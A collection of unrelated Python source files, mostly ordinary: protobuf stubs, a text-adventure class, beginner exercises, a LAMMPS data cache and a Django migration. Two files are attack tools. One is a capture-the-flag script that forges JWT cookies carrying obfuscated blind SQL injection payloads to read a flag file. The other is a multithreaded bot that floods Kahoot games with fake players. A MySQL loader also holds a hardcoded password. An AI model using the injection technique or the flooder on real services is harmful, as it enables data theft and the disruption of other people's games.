def ClearField(self, field_name: typing_extensions___Literal[u"instrumentation_library_spans",b"instrumentation_library_spans",u"resource",b"resource"]) -> None: ...
type___ResourceSpans = ResourceSpans
class InstrumentationLibrarySpans(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def instrumentation_library(self) -> opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary: ...
@property
def spans(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span]: ...
def __init__(self,
*,
instrumentation_library : typing___Optional[opentelemetry___proto___common___v1___common_pb2___InstrumentationLibrary] = None,
spans : typing___Optional[typing___Iterable[type___Span]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> InstrumentationLibrarySpans: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> InstrumentationLibrarySpans: ...
def HasField(self, field_name: typing_extensions___Literal[u"instrumentation_library",b"instrumentation_library"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"instrumentation_library",b"instrumentation_library",u"spans",b"spans"]) -> None: ...
type___InstrumentationLibrarySpans = InstrumentationLibrarySpans
class Span(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
SpanKindValue = typing___NewType('SpanKindValue', builtin___int)
type___SpanKindValue = SpanKindValue
class SpanKind(object):
DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...
@classmethod
def Name(cls, number: builtin___int) -> builtin___str: ...
@classmethod
def Value(cls, name: builtin___str) -> Span.SpanKindValue: ...
@classmethod
def keys(cls) -> typing___List[builtin___str]: ...
@classmethod
def values(cls) -> typing___List[Span.SpanKindValue]: ...
@classmethod
def items(cls) -> typing___List[typing___Tuple[builtin___str, Span.SpanKindValue]]: ...
SPAN_KIND_UNSPECIFIED = typing___cast(Span.SpanKindValue, 0)
INTERNAL = typing___cast(Span.SpanKindValue, 1)
SERVER = typing___cast(Span.SpanKindValue, 2)
CLIENT = typing___cast(Span.SpanKindValue, 3)
PRODUCER = typing___cast(Span.SpanKindValue, 4)
CONSUMER = typing___cast(Span.SpanKindValue, 5)
SPAN_KIND_UNSPECIFIED = typing___cast(Span.SpanKindValue, 0)
INTERNAL = typing___cast(Span.SpanKindValue, 1)
SERVER = typing___cast(Span.SpanKindValue, 2)
CLIENT = typing___cast(Span.SpanKindValue, 3)
PRODUCER = typing___cast(Span.SpanKindValue, 4)
CONSUMER = typing___cast(Span.SpanKindValue, 5)
type___SpanKind = SpanKind
class Event(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
time_unix_nano: builtin___int = ...
name: typing___Text = ...
dropped_attributes_count: builtin___int = ...
@property
def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
def __init__(self,
*,
time_unix_nano : typing___Optional[builtin___int] = None,
name : typing___Optional[typing___Text] = None,
attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
dropped_attributes_count : typing___Optional[builtin___int] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Span.Event: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span.Event: ...
def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"name",b"name",u"time_unix_nano",b"time_unix_nano"]) -> None: ...
type___Event = Event
class Link(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
trace_id: builtin___bytes = ...
span_id: builtin___bytes = ...
trace_state: typing___Text = ...
dropped_attributes_count: builtin___int = ...
@property
def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
def __init__(self,
*,
trace_id : typing___Optional[builtin___bytes] = None,
span_id : typing___Optional[builtin___bytes] = None,
trace_state : typing___Optional[typing___Text] = None,
attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
dropped_attributes_count : typing___Optional[builtin___int] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Span.Link: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span.Link: ...
def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"span_id",b"span_id",u"trace_id",b"trace_id",u"trace_state",b"trace_state"]) -> None: ...
type___Link = Link
trace_id: builtin___bytes = ...
span_id: builtin___bytes = ...
trace_state: typing___Text = ...
parent_span_id: builtin___bytes = ...
name: typing___Text = ...
kind: type___Span.SpanKindValue = ...
start_time_unix_nano: builtin___int = ...
end_time_unix_nano: builtin___int = ...
dropped_attributes_count: builtin___int = ...
dropped_events_count: builtin___int = ...
dropped_links_count: builtin___int = ...
@property
def attributes(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]: ...
@property
def events(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span.Event]: ...
@property
def links(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[type___Span.Link]: ...
@property
def status(self) -> type___Status: ...
def __init__(self,
*,
trace_id : typing___Optional[builtin___bytes] = None,
span_id : typing___Optional[builtin___bytes] = None,
trace_state : typing___Optional[typing___Text] = None,
parent_span_id : typing___Optional[builtin___bytes] = None,
name : typing___Optional[typing___Text] = None,
kind : typing___Optional[type___Span.SpanKindValue] = None,
start_time_unix_nano : typing___Optional[builtin___int] = None,
end_time_unix_nano : typing___Optional[builtin___int] = None,
attributes : typing___Optional[typing___Iterable[opentelemetry___proto___common___v1___common_pb2___AttributeKeyValue]] = None,
dropped_attributes_count : typing___Optional[builtin___int] = None,
events : typing___Optional[typing___Iterable[type___Span.Event]] = None,
dropped_events_count : typing___Optional[builtin___int] = None,
links : typing___Optional[typing___Iterable[type___Span.Link]] = None,
dropped_links_count : typing___Optional[builtin___int] = None,
status : typing___Optional[type___Status] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Span: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Span: ...
def HasField(self, field_name: typing_extensions___Literal[u"status",b"status"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"attributes",b"attributes",u"dropped_attributes_count",b"dropped_attributes_count",u"dropped_events_count",b"dropped_events_count",u"dropped_links_count",b"dropped_links_count",u"end_time_unix_nano",b"end_time_unix_nano",u"events",b"events",u"kind",b"kind",u"links",b"links",u"name",b"name",u"parent_span_id",b"parent_span_id",u"span_id",b"span_id",u"start_time_unix_nano",b"start_time_unix_nano",u"status",b"status",u"trace_id",b"trace_id",u"trace_state",b"trace_state"]) -> None: ...
type___Span = Span
class Status(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
StatusCodeValue = typing___NewType('StatusCodeValue', builtin___int)
type___StatusCodeValue = StatusCodeValue
class StatusCode(object):
DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...
@classmethod
def Name(cls, number: builtin___int) -> builtin___str: ...
@classmethod
def Value(cls, name: builtin___str) -> Status.StatusCodeValue: ...
@classmethod
def keys(cls) -> typing___List[builtin___str]: ...
@classmethod
def values(cls) -> typing___List[Status.StatusCodeValue]: ...
@classmethod
def items(cls) -> typing___List[typing___Tuple[builtin___str, Status.StatusCodeValue]]: ...
Ok = typing___cast(Status.StatusCodeValue, 0)
Cancelled = typing___cast(Status.StatusCodeValue, 1)
UnknownError = typing___cast(Status.StatusCodeValue, 2)
InvalidArgument = typing___cast(Status.StatusCodeValue, 3)
DeadlineExceeded = typing___cast(Status.StatusCodeValue, 4)
NotFound = typing___cast(Status.StatusCodeValue, 5)
AlreadyExists = typing___cast(Status.StatusCodeValue, 6)
PermissionDenied = typing___cast(Status.StatusCodeValue, 7)
ResourceExhausted = typing___cast(Status.StatusCodeValue, 8)
FailedPrecondition = typing___cast(Status.StatusCodeValue, 9)
Aborted = typing___cast(Status.StatusCodeValue, 10)
OutOfRange = typing___cast(Status.StatusCodeValue, 11)
Unimplemented = typing___cast(Status.StatusCodeValue, 12)
InternalError = typing___cast(Status.StatusCodeValue, 13)
Unavailable = typing___cast(Status.StatusCodeValue, 14)
DataLoss = typing___cast(Status.StatusCodeValue, 15)
Unauthenticated = typing___cast(Status.StatusCodeValue, 16)
Ok = typing___cast(Status.StatusCodeValue, 0)
Cancelled = typing___cast(Status.StatusCodeValue, 1)
UnknownError = typing___cast(Status.StatusCodeValue, 2)
InvalidArgument = typing___cast(Status.StatusCodeValue, 3)
DeadlineExceeded = typing___cast(Status.StatusCodeValue, 4)
NotFound = typing___cast(Status.StatusCodeValue, 5)
AlreadyExists = typing___cast(Status.StatusCodeValue, 6)
PermissionDenied = typing___cast(Status.StatusCodeValue, 7)
ResourceExhausted = typing___cast(Status.StatusCodeValue, 8)
FailedPrecondition = typing___cast(Status.StatusCodeValue, 9)
Aborted = typing___cast(Status.StatusCodeValue, 10)
OutOfRange = typing___cast(Status.StatusCodeValue, 11)
Unimplemented = typing___cast(Status.StatusCodeValue, 12)
InternalError = typing___cast(Status.StatusCodeValue, 13)
Unavailable = typing___cast(Status.StatusCodeValue, 14)
DataLoss = typing___cast(Status.StatusCodeValue, 15)
Unauthenticated = typing___cast(Status.StatusCodeValue, 16)
type___StatusCode = StatusCode
code: type___Status.StatusCodeValue = ...
message: typing___Text = ...
def __init__(self,
*,
code : typing___Optional[type___Status.StatusCodeValue] = None,
message : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> Status: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> Status: ...
def ClearField(self, field_name: typing_extensions___Literal[u"code",b"code",u"message",b"message"]) -> None: ...
type___Status = Status
|
'''
@title Text Adventure: Room Class
@author Carlos Barcelos
@date 06 January 2019
The room class with member veriables and functions.
'''
import src.stdlib as std # Import standard libraries
from src.Item import Item # Work with Item objects
from src.Enemy import Enemy # Work with Item objects
from src.Equipment import Equipment # Work with Equipment objects
class Room():
def __init__(self, name, details, resources):
self.name = name
room = toRoom(details, resources)
self.title = room['title']
self.description = room['description']
self.items = room['items']
self.examine = room['examine']
self.use = room['use']
self.ability = room['ability']
self.enemies = room['enemies']
self.connections = room['connections']
self.area = room['area']
self.icon = room['icon']
self.coordinates = room['coordinates']
self.visited = room['visited']
# Overload __str__
def __str__(self):
return str(self.name)
# Convert from a room object to a JSON string
def toJSON(self):
jData = {}
jData['title'] = self.title
jData['description'] = self.description
jData['items'] = []
for item in self.items:
i = item.dictName
jData['items'].append(i)
jData['examine'] = self.examine
jData['use'] = self.use
jData['ability'] = self.ability
jData['enemies'] = []
for enemy in self.enemies:
e = enemy.toJSON()
jData['enemies'].append(e)
jData['connections'] = self.connections
jData['area'] = self.area
jData['icon'] = self.icon
jData['coordinates'] = self.coordinates
jData['visited'] = self.visited
return jData
# Convert from a JSON string to a room object
def toRoom(details, resources):
room = {}
# The following must have non-null values
room['title'] = details['title']
room['description'] = details['description']
room['connections'] = details['connections']
room['area'] = details['area']
room['icon'] = details['icon']
room['coordinates'] = details['coordinates']
room['visited'] = details['visited']
# The following may be empty and are handled accordingly
room['items'] = []
for item in details.get('items', []):
i = std.itemNameToObject(item, resources)
room['items'].append(i)
room['enemies'] = []
for eDetails in details.get('enemies', []):
e = Enemy(eDetails['name'], eDetails, resources)
room['enemies'].append(e)
room['examine'] = details.get('examine')
room['use'] = details.get('use')
room['ability'] = details.get('ability', {})
return room
|
# coding=utf-8
# 一个一个读取
# select load_file('E:\flag.txt')
# select ascii(mid((select load_file('E:\flag.txt')),1,1));
# 直接注入表读取
# create table abc(cmd text);
# insert into abc(cmd) values (load_file('E:\flag.txt'));
# select * from abc;
import jwt
import requests
import re
requests.packages.urllib3.disable_warnings()
key = "xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"
url = "http://challenge-6761886944b031a8.sandbox.ctfhub.com:10080/"
proxies = {"http":"http://127.0.0.1:8080","https":"http://127.0.0.1:8080"}
# info = jwt.decode("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4iLCJuZXdzIjoia2V5OnhSdCpZTURxeUNDeFl4aTlhQExnY0dwbm1NMlg4aSY2In0.EpNdctJ5Knu4ZkRcatsyMOxas1QgomB0Z49qb7_eoVg",key,algorithms=['HS256'])
# if info:
# print(info)
# payloadTmpl = "i'/**/or/**/ascii(mid(database(),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(sc<a>hema_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.S<a>CHEMATA),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(ta<a>ble_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.t<a>ables/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
# payloadTmpl = "i'/**/or/**/ascii(mid((s<a>elect/**/g<a>roup_con<a>cat(col<a>umn_name)/**/fr<a>om/**/info<a>rmation_sc<a>hema.c<a>olumns/**/wher<a>e/**/ta<a>ble_s<a>chema=dat<a>abase()),{},1))>{}#"
payloadTmpl = "i'/**/or/**/ascii(mid((se<a>lect/**/lo<a>ad_fi<a>le('/fl<a>ag')),{},1))>{}#"
def half_interval():
result = ""
for i in range(1,55):
min = 32
max = 127
while abs(max-min) > 1:
mid = (min + max)//2
payload = payloadTmpl.format(i,mid)
jwttoken = {
"user": payload,
"news": "success"
}
payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
cookies = dict(token=str(payload))
res = requests.get(url,cookies=cookies)
# res = requests.get(url,cookies=cookies,proxies=proxies)
if re.findall("success", res.text) != []:
min = mid
else:
max = mid
result += chr(max)
print(result)
if __name__ == "__main__":
half_interval()
# payload = payloadTmpl.format(1,32)
# jwttoken = {
# "user": payload,
# "news": "success"
# }
# print(jwttoken)
# payload = jwt.encode(jwttoken, key, algorithm='HS256').decode("ascii")
# print(payload)
# cookies = dict(token=str(payload))
# res = requests.get(url,cookies=cookies,proxies=proxies)
# res.encoding='utf-8'
# print(res.text) |
from adapters.generic.motion_sensor import MotionSensorAdapter
from adapters.generic.temp_hum_sensor import TemperatureHumiditySensorAdapter
sonoff_adapters = {
'SNZB-02': TemperatureHumiditySensorAdapter, # SONOFF Temperature and humidity sensor
'SNZB-03': MotionSensorAdapter, # SONOFF Motion sensor
}
|
# 함수명: sumEven1, 매개변수: 가변형, 리턴값: 1개
# 기능: 아규먼트가 몇 개가 전달되든 처리해야 한다.
# 아규먼트는 1 이상의 숫자만 온다고 정한다.
# 전달된 아규먼트들에서 짝수에 해당하는 숫자들만 합을 계산해서 리턴한다.
# 전달된 아규먼트들 중에서 짝수가 없으면 0을 리턴한다.
# 아규먼트가 전달되지 않으면 -1을 리턴한다.
def sumEven1(*ints) :
sum = 0
if not ints :
return -1
else :
for num in ints :
if num % 2 == 0 :
sum += num
return sum
print(sumEven1())
print(sumEven1(1, 3, 5, 7))
print(sumEven1(2, 3))
print(sumEven1(2, 3, 4)) |
def monthlyactivity(interest, principal, apr, limit, totalprin):
print "enter day number from this month and transactions on that day, in order. Enter day as 31 to end simulation for this month,"
day = 0
prevday = 0
while day<31:
day = int(input("enter day number: "))
if day == 31:
newinterest = (day-prevday) * (apr/365) * principal
interest+=newinterest
totalprin=principal
check = int(input("would you like to end the entire simulation? Enter 1 for 'yes' and 0 for 'no':"))
if check ==1:
break
else:
#principal = 0.0
day = 0
prevday = 0
print "at the end of this month, total pending = $" + str(int(((totalprin+interest)*100) + 0.5)/100.0)
continue
else:
if(day>31) or (day<=prevday):
day = prevday
print "your day was either before the previous day or more than 31. Retry entering the day"
continue
else:
newinterest = (day-prevday) * (apr/365) * principal
interest+=newinterest
counter = 0
transact =0
activity = 0
print "enter transactions now. Eg, for deposit of $100, type '-100', and for withdrawal of $100, type '100'. Enter 0 for ending this day's transactions"
while (counter==0 or transact!=0):
counter = 1
try:
transact = float(input("transaction: "))
if transact == 0.0:
break
except:
break
else:
if principal+transact<0:
print "your deposit was too much and $" + str(-1*(principal+transact)) + " of it has been returned"
principal = 0
elif principal+transact>limit:
print "your withdrawal was too much and $" + str(transact) + " has been declined"
else:
activity+=transact
principal+=transact
prevday = day
return [interest, principal, totalprin]
def main():
try:
apr = float(input("Enter apr as a decimal. Eg: 25% is 0.25 : " ))
except:
apr = 0.25
try:
limit = float(input("enter credit limit: "))
except:
limit = 1000.0
principal = 0.0
interest = 0.0
totalprin = 0.0
result = monthlyactivity(interest, principal, apr, limit, totalprin)
interest = result[0]
principal = result[1]
totalprin = result[2]
print "at the end of your entire credit history for this account, total payable = $" + str(int(((totalprin+interest)*100) + 0.5)/100.0)
main() |
#!/usr/bin/env python
# Funtion:
# Filename:
import logging
logging.basicConfig(filename='123.log', level=logging.INFO)
# logging 的5个级别
logging.debug('test debug')
logging.info('test info')
logging.warning('test warning')
logging.error('test error')
logging.critical('test critical') |
import MySQLdb
import MySQLdb.cursors
import traceback
def user_add():
with open('storage/email', encoding='utf-8') as f:
email_list = [email.strip() for email in f.readlines()]
with open('storage/name', encoding='utf-8') as f1:
name_list = [username.strip() for username in f1.readlines()]
zipped = zip(email_list, name_list)
return zipped
MYSQL_CONFIG = {
'host': 'localhost',
'port': 3306,
'user': 'coder',
'passwd': 'My1qaz2wsx',
'db': 'library',
'charset': 'utf8mb4',
'cursorclass': MySQLdb.cursors.DictCursor
}
class Store:
def __init__(self, **kwargs):
try:
self.conn = MySQLdb.connect(**kwargs)
except:
traceback.print_exc()
def execute_sql(self, _sql, *args):
if 'select' in _sql:
cur = self.conn.cursor()
cur.execute(_sql, args)
return cur.fetchall()
else:
if 'insert' in _sql or 'where' in _sql:
cur = self.conn.cursor()
cur.execute(_sql, args)
self.conn.commit()
else:
print('no where')
def close(self):
cursor = self.conn.cursor()
cursor.close()
self.conn.close()
def add_storage():
book_store = Store(**MYSQL_CONFIG)
sql_insert = "insert into storage_storage(book, inventory, remain, add_date)values(%s,1,1,CURDATE())"
book_set = set()
with open('books', encoding='utf-8') as f:
for line in f:
line = line.replace('《', '').replace('》', '').strip()
if line:
book_set.add(line)
for book in book_set:
book_store.execute_sql(sql_insert, book)
if __name__ == '__main__':
add_storage()
|
from mock_data import mock_data
me = {
"firstname":"Shane",
"lastname":"Dixon",
"email":"shanedixon13@gmail.com",
"age":25,
"hobbies":[],
"address":{
"street":"Bradley Ln",
"city":"Lonoke"
}
}
print(me["firstname"]+" "+me["lastname"])
print(me["address"]["city"])
#modify existing
me["age"]=26
#create new
me["new"]=1
print(me)
#list
names=[]
names.append("Shane")
names.append("Jake")
names.append("Guillermo")
print(names)
#get elements
print(names[0])
print(names[2])
#for loop
for name in names: #variable can be named anything
print(name)
ages = [12,32,456,10,23,678,4356,2,46,789,23,67,13]
#find the youngest
x=ages[0]
for age in ages:
if age<x:
x=age
print(x)
#print the title of every product
for item in mock_data:
print(item["title"]) |
import turtle
window = turtle.Screen()
window.bgcolor("red")
t1=turtle.Turtle()
t1.shape("turtle")
t1.color("yellow")
t1.speed(10)
def draw_square(t1):
for i in range(1,5):
t1.forward(100)
t1.right(90)
for i in range(1,36):
draw_square(t1)
t1.right(20)
window.exitonclick()
|
#024: Longest Increasing Subsequence
#http://rosalind.info/problems/lgis/
#Given: A positive integer n<=10000 followed by a permutation p of length n.
n = 5
p = [5, 1, 4, 2, 3]
#If parsing from file:
f = open('rosalind_lgis.txt', 'r')
contents = f.read().rstrip()
f.close()
lines = contents.split('\n')
n = int(lines[0])
permutations = lines[1].split(' ')
p = [int(perm) for perm in permutations]
#Return: A longest increasing subsequence of p, followed by a longest decreasing subsequence of p.
from operator import attrgetter
def getLongestPath(p, order = 'increasing'):
class Vertex:
def __repr__(self):
return "vertex " + str(self.name)
def __init__(self, name):
# ALL instance members should be declared here:
self.name = name
self.ins = []
self.max_path = []
self.max_path_length = 0
def setIns(self, vts):
for v in vts:
if self.name == 'finish':
self.ins.append(v)
elif order == 'increasing' and self.name > v.name:
self.ins.append(v)
elif order == 'decreasing' and self.name < v.name:
self.ins.append(v)
def setMaxPath(self):
if len(self.ins) > 0:
longest_path = max(self.ins,key=attrgetter('max_path_length'))
self.max_path = longest_path.max_path[:]
else:
self.max_path = []
self.max_path.append(self.name)
self.max_path_length = len(self.max_path) + 1
#Adding sentinel
p.append('finish')
vertexes = []
for element in p:
v = Vertex(element)
v.setIns(vertexes)
v.setMaxPath()
vertexes.append(v)
path = vertexes.pop().max_path[:-1]
if order == 'descending':
return path.pop() # get rid of the sentinel
else:
return path
asc = getLongestPath(p)
desc = getLongestPath(p, 'decreasing')
print asc
print desc
#If writing to file:
#f = open('rosalind_lgis_output.txt', 'w')
#for i in asc:
#f.write(str(i) + ' ')
#f.write('\n')
#for i in des:
#f.write(str(i) + ' ')
#f.write('\n')
#f.close()
|
import ctypes
import numpy
from simphony.core.cuba import CUBA
from simphony.core.keywords import KEYWORDS
from simphony.core.data_container import DataContainer
from simlammps.common.atom_style_description import get_all_attributes
class ParticleDataCache(object):
""" Class handles particle-related data
Class stores all particle-related data and has methods
in order to retrieve this data from LAMMPS and send this
data to LAMMPS.
Parameters
----------
lammps :
lammps python wrapper
atom_style : AtomStyle
style of atoms
material_atom_type_manager : MaterialAtomTypeManager
class that manages the relationship between material-uid and atom_type
"""
def __init__(self, lammps, atoms_style, material_atom_type_manager):
self._lammps = lammps
self._material_atom_type_manager = material_atom_type_manager
self._data_attributes = get_all_attributes(atoms_style)
# map from uid to 'index in lammps arrays'
self._index_of_uid = {}
# cache of particle-related data (stored by CUBA keyword)
self._cache = {}
# cache of coordinates
self._coordinates = []
self._cache[CUBA.MATERIAL_TYPE] = []
for attribute in self._data_attributes:
self._cache[attribute.cuba_key] = []
def retrieve(self):
""" Retrieve all data from lammps
"""
self._coordinates = self._lammps.gather_atoms("x", 1, 3)
for attribute in self._data_attributes:
keyword = KEYWORDS[attribute.cuba_key.name]
# we handle material type seperately
if attribute.cuba_key == CUBA.MATERIAL_TYPE:
self._cache[attribute.cuba_key] = self._lammps.gather_atoms(
"type",
0,
1)
continue
self._cache[attribute.cuba_key] = self._lammps.gather_atoms(
attribute.lammps_key,
_get_type(keyword),
_get_count(keyword))
def send(self):
""" Send data to lammps
"""
self._lammps.scatter_atoms(
"x", 1, 3,
(ctypes.c_double * len(self._coordinates))(*self._coordinates))
for attribute in self._data_attributes:
keyword = KEYWORDS[attribute.cuba_key.name]
values = self._cache[attribute.cuba_key]
# we handle material type seperately
if attribute.cuba_key == CUBA.MATERIAL_TYPE:
self._lammps.scatter_atoms("type",
0,
1,
(ctypes.c_int * len(
values))(*values))
continue
self._lammps.scatter_atoms(attribute.lammps_key,
_get_type(keyword),
_get_count(keyword),
(_get_ctype(keyword) * len(values))(
*values))
def get_particle_data(self, uid):
""" get particle data
Parameters
----------
uid : UUID
uid for particle
Returns
-------
data : DataContainer
data of the particle
"""
data = DataContainer()
index = self._index_of_uid[uid]
for attribute in self._data_attributes:
# we handle material type seperately
if attribute.cuba_key == CUBA.MATERIAL_TYPE:
# convert from the integer atom_type to material-uid)
data[CUBA.MATERIAL_TYPE] = \
self._material_atom_type_manager.get_material_uid(
self._cache[CUBA.MATERIAL_TYPE][index])
continue
count = _get_count(KEYWORDS[attribute.cuba_key.name])
i = index * count
if count > 1:
# always assuming that its a tuple
# ( see https://github.com/simphony/simphony-common/issues/18 )
data[attribute.cuba_key] = tuple(
self._cache[attribute.cuba_key][i:i+count])
else:
data[attribute.cuba_key] = self._cache[attribute.cuba_key][i]
return data
def get_coordinates(self, uid):
""" Get coordinates for a particle
Parameters
----------
uid : uid
uid of particle
"""
i = self._index_of_uid[uid] * 3
coordinates = self._coordinates[i:i+3]
return tuple(coordinates)
def set_particle(self, coordinates, data, uid):
""" set particle coordinates and data
Parameters
----------
coordinates : tuple of floats
particle coordinates
data : DataContainer
data of the particle
uid : uuid
uuid of the particle
"""
if uid not in self._index_of_uid:
self._index_of_uid[uid] = len(self._index_of_uid)
i = self._index_of_uid[uid] * 3
self._coordinates[i:i+3] = coordinates[0:3]
index = self._index_of_uid[uid]
# add each attribute
for attribute in self._data_attributes:
value = data[attribute.cuba_key]
if attribute.cuba_key == CUBA.MATERIAL_TYPE:
# convert to atom_type (int)
value = self._material_atom_type_manager.get_atom_type(value)
self._add_to_cache(attribute.cuba_key,
index,
value)
def _add_to_cache(self, cuba_key, index, value):
""" Add value to cache
Parameters
----------
cuba_key : CUBA
cuba key
index : int
index in cache
value : float or int or float[3] or int[3]
value added to cache
"""
keyword = KEYWORDS[cuba_key.name]
shape = keyword.shape
if shape == [1]:
if index < len(self._cache[cuba_key]):
self._cache[cuba_key][index] = value
elif index == len(self._cache[cuba_key]):
self._cache[cuba_key].append(value)
else:
msg = "Problem with index {}".format(index)
raise IndexError(msg)
elif shape == [3]:
index = index * 3
self._cache[cuba_key][index:index+3] = value[0:3]
else:
raise RuntimeError("Unsupported shape: {0}".format(shape))
def _get_ctype(keyword):
""" get ctype
Parameters
----------
keyword : Keyword
"""
if keyword.dtype == numpy.int32:
return ctypes.c_int
elif keyword.dtype == numpy.float64:
return ctypes.c_double
else:
raise RuntimeError(
"Unsupported type {}".format(keyword.dtype))
def _get_type(keyword):
""" get type
Get type which is a 1 or 0 to signify if its a
int or float for lammps gather/scatter methods
Parameters
----------
keyword : Keyword
"""
if keyword.dtype == numpy.int32:
return 0
elif keyword.dtype == numpy.float64:
return 1
else:
raise RuntimeError(
"Unsupported type {}".format(keyword.dtype))
def _get_count(keyword):
""" get count type
Parameters
----------
keyword : Keyword
"""
if keyword.shape == [1]:
return 1
elif keyword.shape == [3]:
return 3
else:
raise RuntimeError("Unsupported shape: {0}".format(keyword.shape))
|
#!/usr/bin/env python3
import argparse
import os
import random
import sys
import threading
from itertools import count
from string import ascii_letters, digits
from colorama import Fore
from kahoot import client
def getargs():
parser = argparse.ArgumentParser(description='Kahoot Flooder Bot - Created by Music_Dude#0001')
parser.add_argument('code', metavar='CODE', type=int)
parser.add_argument('-t', '--threads', type=int, default=1, help='number of threads to run in each process')
group = parser.add_mutually_exclusive_group()
group.add_argument('-n', '--nick', type=str, default='', metavar='NICK', help='nickname to use, e.g. nick1, nick2...')
group.add_argument('-r', '--random-nick', dest='rand', action='store_true', help='join using random nicknames')
return parser.parse_args()
def main():
global i
while True:
if args.rand:
name = ''.join(random.choices(ascii_letters + digits, k=8))
else:
name = args.nick + str(i+1)
if client().join(args.code, name) is None:
print(f'{Fore.LIGHTBLUE_EX}{threading.current_thread().getName():10}{Fore.RESET} | {Fore.MAGENTA}{i+1:^3}{Fore.RESET} | Joining as {Fore.RED}{name}{Fore.RESET}')
else:
print(f'{Fore.RED}Failed to join {args.code}!{Fore.RESET}')
exit(1)
i += 1
if __name__ == '__main__':
args = getargs()
threads = []
i = 0
for _ in range(args.threads):
t = threading.Thread(target=main)
threads.append(t)
for thread in threads:
thread.start()
|
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Contains functions to create default values for parameters.
"""
from neon.params.val_init import GaussianValGen
from neon.metrics.misclass import MisclassPercentage
def default_weight_init():
return GaussianValGen(loc=0.0, scale=0.01)
def default_lrule_init():
gdm = {
'type': 'gradient_descent_momentum',
'lr_params': {
'learning_rate': 0.1,
'momentum_params': {
'type': 'constant',
'coef': 0.9
}
}
}
return gdm
def default_metric():
metric = {
'train': [MisclassPercentage()],
'test': [MisclassPercentage()],
}
return metric
|
# coding:utf-8
__author__ = 'Baxter'
def insert():
pass
def update():
pass
def delte():
pass
def select():
pass |
# Generated by Django 2.1.7 on 2019-03-30 12:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0004_auto_20190330_1402'),
]
operations = [
migrations.AlterField(
model_name='partnermodel',
name='description',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Краткое описание'),
),
migrations.AlterField(
model_name='partnermodel',
name='email',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Email'),
),
migrations.AlterField(
model_name='partnermodel',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='', verbose_name='Картинка'),
),
migrations.AlterField(
model_name='partnermodel',
name='inn',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='ИНН'),
),
migrations.AlterField(
model_name='partnermodel',
name='phone',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Телефон'),
),
migrations.AlterField(
model_name='partnermodel',
name='site',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Веб-сайт'),
),
]
|
class Solution(object):
def removeDuplicates(self, nums):
"""
